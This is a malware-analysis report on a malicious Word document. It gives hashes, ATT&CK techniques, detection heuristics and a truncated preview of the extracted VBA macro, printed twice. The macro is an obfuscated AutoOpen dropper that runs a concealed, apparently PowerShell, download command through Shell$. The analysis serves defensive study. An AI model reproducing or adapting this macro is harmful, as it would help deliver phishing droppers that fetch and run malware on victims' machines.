Office (OLE) malware analysis — malicious · b2938bbd574d71fe

MALICIOUS

Office (OLE)

172.0 KB Created: 2017-12-14 12:10:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: ca9914be9819345508d2653f1bf40640 SHA-1: 444dfe12b7f1e06bc7cbdfd7b483cfba87c6ae57 SHA-256: b2938bbd574d71feac693e9d07f8aef129e02f5f175009e7b8cfcb3dafd245d0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute code. This indicates an attempt to download and run a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a malicious dropper or phishing lure functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73615 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	73615 bytes
SHA-256: `f0619fce13b98d7d3b2ed55c2005a13d9525e007565edba93a4cc1dee940cf49`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WpApPdjlNzvM" Sub AutoOpen() BGqvAFcFpzS = "zoBDLzNYU" + "ckNRsDDnoGZ" + "ErZmDTDHvfVuwi" + "jBkXBHZiFii" + "YBCKMtBjJ" + "YwtUMjwPSTJ" + "UlEiXqfMTD" + "FiGtVIAwwU" + "codjuti" + "QODzjQFdWLEwK" + "bopFmbGSXK" + "PIPFqvl" cnFBfacPfik = "XuHMorpHHkzrtu" + "HqYfQTShh" + "mJfJLanmQh" + "BDQzGiXspO" + "lIVZHzUa" + "MaqChJz" + "JKFcMwGmHjJpup" + "IdXWomToRqbIa" + "ORzjbiiIj" + "MOmzSLlKXi" + "YJmJJpWnllnj" + "tOMITGMzzw" ZzUVGFQl = "fpIKXRsIVvnZi" + "FEwcrQVib" + "cjKVAjjU" + "nuEFBlB" + "EdCLkrmPR" + "cZUWwOwh" + "HXHpOTWuSBwwr" + "CRFYzrrYFjYDu" + "RzpHUwuqwonr" + "wTOSLljSF" + "pwpwjRXQLYodU" + "qcuvLUQl" duErRMSK = "LGAIiALYZ" + "bTZTwCbiqo" + "laErMBia" + "DtNZROL" + "wuknutJnEbGo" + "ibWIZjwQSwjwT" + "iFABkrtkw" + "TqjuDHa" + "lQZRrQshPR" + "wDpbabiDZVz" + "tfTpjzBNKXJMCt" + "NkJCccEAz" VBA.Shell$ FjTRNSVMnAMWmr, 0 PGTVEABnUjm = "aJhNDVYucY" + "KUTQTVTofTLT" + "irGWHYiMipJAUO" + "jbFBqZIAkk" + "SAsHFOpoiMPB" + "DqUjfJQwHvFDN" + "dUarVmYG" + "UWkvLjjMTaSz" + "EbVaUkLEmErELT" + "UtPOzHz" + "vOFRXjld" + "MdPwWuRouihSsq" MirZLEAsFSZLPT = "VBavrhEGwzzZC" + "SrCXFEsrLSr" + "lKjwjCVH" + "jrzzRIYt" + "NizOnbXnKOv" + "pIDiwuaBPvE" + "UlzFYnwUwlENPW" + "FYvsGMfrit" + "VNwrKSZBuB" + "SPWRafEEqOZ" + "VcUDzjouQL" + "SiVGamo" cVdGfVolA = "iDGwqdOqPbSFH" + "GMEjFYdS" + "BwBrWoh" + "woHlIwWr" + "rkXNuXORzTRFj" + "JMBEzolsBiS" + "RzZwQirMjt" + "oGZnaWVPDRMwZH" + "WDGziouaFOsBD" + "NTvPRMwZBLVf" + "OCFBAqYLo" + "hKGufTZ" End Sub Function FjTRNSVMnAMWmr() wMFOX = IsNull("AWNmcbl") + IsNull("VbidKbMKZnpwb") + IsNull("idzKLhu") + IsNull("CqEXViGlOthjKn") + IsNull("UwCATjV") + IsNull("ZiwskmRPDzXYs") + IsNull("mFdDnYwQut") idjYspPa = IsNull("jHwJRhHVzG") + IsNull("kwoFDqCvbdID") + IsNull("ppFlQijvQfQZn") + IsNull("FmzRiwi") + IsNull("RAkuQzTp") + IsNull("YDLUbcWFUXqUTY") + IsNull("PnzIdMdGJiX") cNMdzHdMzn = Mid("LkWOijdV10'+'6+[CHAr]117+[CH'+'Ar]120),[StrInG][CHAr]39)) ').replaCe('JHW',[sTrIng][chaR]39).replaCe('eCx',[sTrIng][chaR]36))HlPYOvlWNPRibc6jpKSNa", 9, 117) WlvOb = IsNull("YfLIjbRhBitYq") + IsNull("zwdijnOMuL") + IsNull("WPswsIjDBMGFGW") + IsNull("Grqutjnhoc") + IsNull("mLFbLkALJ") + IsNull("YkJWJVoJ") + IsNull("rXHOhXVARQjiE") zNqjvUi = IsNull("MjEJJztzj") + IsNull("cHYlYpFiR") + IsNull("zjkLGiz") + IsNull("IfVIwOBKuNpo") + IsNull("OrjqdUnQMBTZl") + IsNull("fvtDbzNqEt") + IsNull("JJjNvssdNi") qIGVvfaR = IsNull("aVYzZAWFvM") + IsNull("iHhXkLwX") + IsNull("kvfzYEqkivadTQ") + IsNull("AlYPJVlbuEzP") + IsNull("chElLHjiqbZVK") + IsNull("WzmjOrwXzniN") + IsNull("wTksZoBHBqo") rLvThMjab = Mid("Qjuxpjux+juxs.JH'+'W+JHWjux+juxde/'+'Njux+juxDHjux+juxhsgdetjux+'+'jux3juJHW+JHWx+jux,bYqwfkiGKVOMQ8pPuqciIHYkm", 2, 85) vqPikU = IsNull("BUdOLQvdCjMtW") + IsNull("BKOpbXmpW") + IsNull("KECRJavYmp") + IsNull("YaNnwvbrkwQNwu") + IsNull("iolKDLzJDHOi") + IsNull("cnoHjVcjBB") + IsNull("cLwmWurDXbv") SsjvsAWRaT = IsNull("fmQIVodWY") + IsNull("FkBQPKUmzQ") + IsNull("opFZDqBWGIXj") + IsNull("zfEXXFstFiLnG") + IsNull("SHnqnairwKjRwb") + IsNull("SNhBMTkFwOtXsi") + IsNull("umwsjPTS") iJhCVOZS = IsNull("mbmibQJf") + IsNull("QHOzIIjdRwdm") + IsNull("hsMLmIP") + IsNull("HtjfBjtm") + IsNull("SrVzMEj") + IsNull("NlKaFcRVjtuVP") + IsNull("BQXIOhRHcnr") GntbOJKmCw = Mid("cVUB4KHx'+'+jux random;xjux+'+'juxEMbcjux+juxdjux+jux = 47jux+jux5hjux+juxttp://secjux+HvW3", 8, 80) AziIdOW = IsNull("ILFitoFHRtnQ") + IsNull("luiiBqbuDmI") + IsNull("QwVGskzvwsBN") + IsNull("MHImGwu") + IsNull("QACNAOcrpEYwzd") + IsNull("kBYJoVfttQhpi") + IsNull("HznNqzvSs") btzMzfJJ = IsNull("OJIOIponvYaSj") + IsNull("BouPwSI") + IsNull("lSwifDz") + IsNull("oEFFqJzNs") + IsNull("AUSiRdJQ") + IsNull("pPcqJiOYqP") + IsNull("JknfjWNaLs") FHLsrs = IsNull("WWDIocQEiPXkh") + IsNull("GZlHIzTYtZhHl") + IsNull("HdwSJjnRRWER") + IsNull("dGTuWPw") + IsNull("QOnJvYzd") + IsNull("aj ... (truncated)

SHA-256: f0619fce13b98d7d3b2ed55c2005a13d9525e007565edba93a4cc1dee940cf49

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WpApPdjlNzvM"
Sub AutoOpen()
BGqvAFcFpzS = "zoBDLzNYU" + "ckNRsDDnoGZ" + "ErZmDTDHvfVuwi" + "jBkXBHZiFii" + "YBCKMtBjJ" + "YwtUMjwPSTJ" + "UlEiXqfMTD" + "FiGtVIAwwU" + "codjuti" + "QODzjQFdWLEwK" + "bopFmbGSXK" + "PIPFqvl"
cnFBfacPfik = "XuHMorpHHkzrtu" + "HqYfQTShh" + "mJfJLanmQh" + "BDQzGiXspO" + "lIVZHzUa" + "MaqChJz" + "JKFcMwGmHjJpup" + "IdXWomToRqbIa" + "ORzjbiiIj" + "MOmzSLlKXi" + "YJmJJpWnllnj" + "tOMITGMzzw"
ZzUVGFQl = "fpIKXRsIVvnZi" + "FEwcrQVib" + "cjKVAjjU" + "nuEFBlB" + "EdCLkrmPR" + "cZUWwOwh" + "HXHpOTWuSBwwr" + "CRFYzrrYFjYDu" + "RzpHUwuqwonr" + "wTOSLljSF" + "pwpwjRXQLYodU" + "qcuvLUQl"
duErRMSK = "LGAIiALYZ" + "bTZTwCbiqo" + "laErMBia" + "DtNZROL" + "wuknutJnEbGo" + "ibWIZjwQSwjwT" + "iFABkrtkw" + "TqjuDHa" + "lQZRrQshPR" + "wDpbabiDZVz" + "tfTpjzBNKXJMCt" + "NkJCccEAz"
VBA.Shell$ FjTRNSVMnAMWmr, 0
PGTVEABnUjm = "aJhNDVYucY" + "KUTQTVTofTLT" + "irGWHYiMipJAUO" + "jbFBqZIAkk" + "SAsHFOpoiMPB" + "DqUjfJQwHvFDN" + "dUarVmYG" + "UWkvLjjMTaSz" + "EbVaUkLEmErELT" + "UtPOzHz" + "vOFRXjld" + "MdPwWuRouihSsq"
MirZLEAsFSZLPT = "VBavrhEGwzzZC" + "SrCXFEsrLSr" + "lKjwjCVH" + "jrzzRIYt" + "NizOnbXnKOv" + "pIDiwuaBPvE" + "UlzFYnwUwlENPW" + "FYvsGMfrit" + "VNwrKSZBuB" + "SPWRafEEqOZ" + "VcUDzjouQL" + "SiVGamo"
cVdGfVolA = "iDGwqdOqPbSFH" + "GMEjFYdS" + "BwBrWoh" + "woHlIwWr" + "rkXNuXORzTRFj" + "JMBEzolsBiS" + "RzZwQirMjt" + "oGZnaWVPDRMwZH" + "WDGziouaFOsBD" + "NTvPRMwZBLVf" + "OCFBAqYLo" + "hKGufTZ"
End Sub
Function FjTRNSVMnAMWmr()
wMFOX = IsNull("AWNmcbl") + IsNull("VbidKbMKZnpwb") + IsNull("idzKLhu") + IsNull("CqEXViGlOthjKn") + IsNull("UwCATjV") + IsNull("ZiwskmRPDzXYs") + IsNull("mFdDnYwQut")
idjYspPa = IsNull("jHwJRhHVzG") + IsNull("kwoFDqCvbdID") + IsNull("ppFlQijvQfQZn") + IsNull("FmzRiwi") + IsNull("RAkuQzTp") + IsNull("YDLUbcWFUXqUTY") + IsNull("PnzIdMdGJiX")
cNMdzHdMzn = Mid("LkWOijdV10'+'6+[CHAr]117+[CH'+'Ar]120),[StrInG][CHAr]39)) ').replaCe('JHW',[sTrIng][chaR]39).replaCe('eCx',[sTrIng][chaR]36))HlPYOvlWNPRibc6jpKSNa", 9, 117)
WlvOb = IsNull("YfLIjbRhBitYq") + IsNull("zwdijnOMuL") + IsNull("WPswsIjDBMGFGW") + IsNull("Grqutjnhoc") + IsNull("mLFbLkALJ") + IsNull("YkJWJVoJ") + IsNull("rXHOhXVARQjiE")
zNqjvUi = IsNull("MjEJJztzj") + IsNull("cHYlYpFiR") + IsNull("zjkLGiz") + IsNull("IfVIwOBKuNpo") + IsNull("OrjqdUnQMBTZl") + IsNull("fvtDbzNqEt") + IsNull("JJjNvssdNi")
qIGVvfaR = IsNull("aVYzZAWFvM") + IsNull("iHhXkLwX") + IsNull("kvfzYEqkivadTQ") + IsNull("AlYPJVlbuEzP") + IsNull("chElLHjiqbZVK") + IsNull("WzmjOrwXzniN") + IsNull("wTksZoBHBqo")
rLvThMjab = Mid("Qjuxpjux+juxs.JH'+'W+JHWjux+juxde/'+'Njux+juxDHjux+juxhsgdetjux+'+'jux3juJHW+JHWx+jux,bYqwfkiGKVOMQ8pPuqciIHYkm", 2, 85)
vqPikU = IsNull("BUdOLQvdCjMtW") + IsNull("BKOpbXmpW") + IsNull("KECRJavYmp") + IsNull("YaNnwvbrkwQNwu") + IsNull("iolKDLzJDHOi") + IsNull("cnoHjVcjBB") + IsNull("cLwmWurDXbv")
SsjvsAWRaT = IsNull("fmQIVodWY") + IsNull("FkBQPKUmzQ") + IsNull("opFZDqBWGIXj") + IsNull("zfEXXFstFiLnG") + IsNull("SHnqnairwKjRwb") + IsNull("SNhBMTkFwOtXsi") + IsNull("umwsjPTS")
iJhCVOZS = IsNull("mbmibQJf") + IsNull("QHOzIIjdRwdm") + IsNull("hsMLmIP") + IsNull("HtjfBjtm") + IsNull("SrVzMEj") + IsNull("NlKaFcRVjtuVP") + IsNull("BQXIOhRHcnr")
GntbOJKmCw = Mid("cVUB4KHx'+'+jux random;xjux+'+'juxEMbcjux+juxdjux+jux = 47jux+jux5hjux+juxttp://secjux+HvW3", 8, 80)
AziIdOW = IsNull("ILFitoFHRtnQ") + IsNull("luiiBqbuDmI") + IsNull("QwVGskzvwsBN") + IsNull("MHImGwu") + IsNull("QACNAOcrpEYwzd") + IsNull("kBYJoVfttQhpi") + IsNull("HznNqzvSs")
btzMzfJJ = IsNull("OJIOIponvYaSj") + IsNull("BouPwSI") + IsNull("lSwifDz") + IsNull("oEFFqJzNs") + IsNull("AUSiRdJQ") + IsNull("pPcqJiOYqP") + IsNull("JknfjWNaLs")
FHLsrs = IsNull("WWDIocQEiPXkh") + IsNull("GZlHIzTYtZhHl") + IsNull("HdwSJjnRRWER") + IsNull("dGTuWPw") + IsNull("QOnJvYzd") + IsNull("aj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.